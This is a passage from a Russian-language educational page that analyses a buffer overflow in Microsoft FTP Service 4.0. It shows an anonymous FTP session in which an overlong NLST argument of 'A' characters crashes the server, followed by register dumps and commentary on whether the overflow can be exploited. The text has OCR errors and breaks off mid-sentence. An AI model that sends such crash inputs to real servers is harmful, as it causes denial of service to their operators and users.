Главная Случайная страница Контакты | Мы поможем в написании вашей работы! | ||
|
VICTIM Microsoft FTP Service (Version 4.0).
User (poor.victim.com:(none)): ftp
Anonymous access allowed, send identity (e-mail name) as password.
Password:
Anonymous user logged in.
ftp" Is
АААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААА
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
PORT command successful.
Opening ASCII mode data connection for file list. -
" ftp: get connection reset by peer
Минимально необходимый объем данных команды NLST, который вызывает
Переполнение, -316 байт, при этом возможен только отказ в обслуживании,
Что следует из содержимого регистров в момент аварийного останова - они
равны:
ЕАХ = 0000005С ЕВХ = 00000001
ЕСХ == OOD3F978 EDX = 002582DD
ESI = OOD3F978 EDI = 00000000
Е1Р = 710F8AA2 ESP = OOD3F644
ЕВР = OOD3F9FO EFL = 00000206
Как видно, ни один из регистров не содержит шестнадцатеричного кода 41,
соответствующего букве "А".
Со строками большей длины картина будет иной, а именно:
ЕАХ = 00000000 ЕВХ = 41414141 ЕСХ = 41414141
EDX = 722С1САС ESI = 41414141
EDI = 41414141 Е1Р = 722C9262 ESP = OOD3F524
ЕВР = OOD3F63C EFL = 00000246
Большое количество кодов (41) означает, что содержимое буфера попадает в
Регистры, правда, не в Е1Р. Следовательно, переполняемый буфер находится
Не в стеке, что усложняет задачу злоумышленника по удаленному выполнению
Дата публикования: 2014-11-04; Прочитано: 279 | Нарушение авторского права страницы | Мы поможем в написании вашей работы!